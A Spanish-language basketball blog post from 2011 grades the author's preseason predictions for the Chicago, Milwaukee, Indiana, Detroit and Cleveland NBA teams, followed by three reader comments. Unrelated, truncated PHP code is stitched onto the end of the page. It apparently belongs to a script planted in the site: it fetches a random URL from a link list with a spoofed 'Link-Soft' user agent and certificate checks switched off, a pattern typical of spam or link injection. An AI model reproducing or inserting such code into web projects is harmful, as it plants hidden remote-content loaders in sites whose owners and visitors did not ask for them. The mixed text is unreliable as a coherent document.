Revisando pronósticos 2011: Central

29 de January de 2011 por TheDeerHunter

CHICAGO BULLS

Pronóstico Septiembre 2010: 4º Este. Semifinales conferencia.
Probabilidad de acierto: Media.
Calificación pronóstico: C+
Análisis

Es bastante probable que nos hayamos quedado cortos en nuestra previsión, ya de por sí optimista para un equipo prácticamente recién montado. Ahora mismo son terceros arrastrando importantes incidencias en el aspecto físico de sus figuras interiores. No han podido disfrutar de la pareja Boozer-Noah, ambos jugadores all-star potencialmente hablando por lo que les hemos podido ver este curso por separado. Se antoja una pareja letal, compensada. Sobradamente capaz de imponerse a las de Orlando o Miami en un hipotético duelo directo.

Derrick Rose sí se ha consolidado como el base más completo de la conferencia y uno de los más relevantes de la liga mejorando aún más sus prestaciones del pasado y Thibodeau ha cumplido con las mejores expectativas dándole ese extraordinario carácter defensivo que les hace falta para aspirar a algo (son 3º en puntos recibidos).

Quizás la única duda que presentan para mirar de tú a tú a los otros gallos de la conferencia serían las alas, dónde parece que Luol Deng ha tocado su techo y no es demasiado alto. Pero tampoco se pueden quejar demasiado en ese sentido ya que todos han cumplido.

En definitiva, su camino no es nada fácil sobre unos objetivos revisados al alza. Apuntamos que adelantaban a Atlanta pero no nos atrevimos a situarlos al mismo nivel de Orlando o Heat. Con Noah y Boozer simultáneamente sanos creo que están en condiciones de soñar con una final de conferencia.

MILWAUKEE BUCKS

Pronóstico Septiembre 2010: 6º Este. Primera Ronda.
Probabilidad de acierto: Baja.
Calificación pronóstico: D
Análisis

Si el año pasado los imprevistos nos perjudicaron a su favor contra un pronóstico pesimista, éste nos ha pasado al contrario. Y es que a la plantilla de los Bucks este año parece que le ha mirado un tuerto.

Tan sólo Ilyasova, Mbah a Moute y Dooling han disputado más de 40 partidos. Por el contrario Jennings, Delfino, Salmons, Bogut, Gooden, el armazón al completo del equipo y los que mejor estaban jugando, han visitado la enfermería buena parte de la campaña con motivos de lo más variopintos, como es el caso del argentino. Scott ha estado en manos de Boykins, Douglas-Roberts o Sanders mucho más tiempo del que hubiera deseado y con todo, el equipo ha mantenido la buena tónica defensiva, que no la ofensiva como es natural.

Es posible que recuperando paulatinamente las piezas y con el bajo nivel de la cola del Este todavía sean capaces de meterse en postemporada, si bien la posibilidad de quedar por encima de los Knicks como sextos parece remota. Tienen más pinta de terminar cumpliendo el dicho “lo que mal empieza mal acaba”, con un inevitable sabor a decepción.

INDIANA PACERS

Pronóstico Septiembre 2010: 12º Este.
Probabilidad de acierto: Media.
Calificación pronóstico: C-
Análisis

Diría que no terminamos de tener claro, ni en nuestras previsiones ni en la realidad más actual, si los Pacers van o vienen. Y tampoco es que se trate de una franquicia de grandes convulsiones ni tampoco de una temporada cargada de incidencias como en otros casos. Es como uno de esos lanzamientos de bola lenta.  Esa especie de estado de letargo donde viven inmersos en Indianápolis que nos hipnotiza.

Lo mismo suena la flauta y nos dejan mal, cazando alguna de las plazas de playoff, o simplemente superan por poco nuestro ya de por sí poco exigente pronóstico, que igual alargan esta mala racha en la que se encuentran y clavamos lo de la 12ª plaza. Tanto da. Hemos fallado en lo esencial y es que no se puede ser optimista a corto-medio plazo con ellos porque no enamoran a nadie. Más bien al contrario. Cada vez parecen más perdidos en el tedio y el desconcierto.

¿Nos quejamos del rendimiento individual del equipo? Pues qué queréis que os diga. Tampoco podemos tirar a la hoguera a los Granger, Hibbert, Collison… en general gente que por momentos han llegado a estar brillantes pero en otros no tanto. Días que Rush, Dunleavy, Hansbrough, Foster, McRoberts, Paul George, Ford o Posey te hacen un partidazo y al día siguiente desaparecen o incluso juegan pocos minutos. ¿Dónde están Solomon y Dahntay Jones, a quienes tanto se les utilizó la temporada pasada? Desconcierto es la palabra. No vemos un presente claro como tampoco un futuro. Si en algo lo teníamos fácil para acertar, su incapacidad para atrapar rebotes, ni eso: Son los 4º mejores de la liga en este apartado.

DETROIT PISTONS

Pronóstico Septiembre 2010: (Muy) Fuera de Playoffs.
Probabilidad de acierto: Media-alta.
Calificación pronóstico: B+
Análisis

Qué mejor definición que “incertidumbre” para definir un equipo que, con todo lo mal que ha jugado, con todas las malas decisiones que han tomado, con el rol que asumen sus más cotizados hombres, con la grave lesión de Jerebko… parecen despertar a estas alturas y, gracias al bajo nivel de la cola del Este, tienen todas las opciones de meterse en postemporada. Están en la cola de la liga en la mayoría de categorías y todavía nos sorprenden con buenos resultados, mucho más a menudo de lo que cabría esperar. Se permiten el lujo de defenestrar a Rip Hamilton (es el tercer mejor jugador de la plantilla en eficiencia acumulada) o a Monroe al principio del curso y ahí están, vivos y coleando.

No son días de vino y rosas para la franquicia de la Motown. Si tienes suerte aún puedes ser testigo de algún gran partido de Stuckey, o de alguna extraordinaria exhibición de T-Mac, Prince, Big Ben o hasta hace poco Hamilton. Puede que incluso puedas asistir a uno de esos raros buenos partidos de Villanueva o Gordon que de lo único que son capaces a estas alturas es de reventar alguna quiniela en la regular. Estas razones y Greg Monroe (o si volviera Jerebko) son las escasas razones que pueden hacer seguir adelante al sufrido seguidor Piston. Hace falta moral… y Dumars dimisión.

CLEVELAND CAVALIERS

Pronóstico Septiembre 2010: “Pintaba chungo”
Probabilidad de acierto: Total
Calificación pronóstico: A+
Análisis

El karma, que decía uno. Siendo sinceros igual no falta razón. Dedican todas sus energías a construir un proyecto sobre unos cimientos inseguros. Después dedican todas sus fuerzas a hacerse mala sangre en el peor ataque de cuernos que se ha visto en la NBA. Entre medias se olvidan que hay una temporada por disputar y que parten con gran desventaja frente al resto de franquicias, pero aún se atreven a mostrarse orgullosos e incluso belicosos. Humildad es lo que hacía falta desde el principio. Parece mentira que no se sepa en una franquicia como esta.

El pronóstico no tiene ningún mérito. Era apuesta segura. Son el peor equipo de la NBA con gran diferencia y veremos cuando pueden ver la luz al final del túnel. Bastante tuvieron con acumular algunas victorias al principio que con un mínimo de interés por medio nadie les va a volver a ceder. Con las retiradas y las fugas si no se espabilan quizás todavía puede ir a peor.

Lo mejor que pueden hacer es ponerse a mirar el futuro. Si lo hacen inmediatamente tan sólo será con un año de retraso.

Imágenes | AP / Getty-Images

Comenta

3 comentarios a esta entrada

  1. Denise dice:
    #1

    Con el poco nivel que hay en las ultimas plazas de playoffs en el Este, si los Pacers no consiguen uno de esos 2 ultimos billetes, para mi sería un fracaso.
    James no le puso los cuernos a Cavs, él acababa contrato y se fue al destino mas atractivo tanto deportivo como economico y social. La verdad es que en Cavs son un poco paletos si piensan que James les ha traicionado.

      Citar

  2. Txusma dice:
    #2

    El entrenador de los Pacers, Jim O’Brien despedido. Veremos si el próximo al menos, no vuelve locos a los jugadores haciéndoles jugar un día 35 minutos y al otro 10.

      Citar

  3. rfeltonAS dice:
    #3

    “Pintaba cgungo”, que cracks xD

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>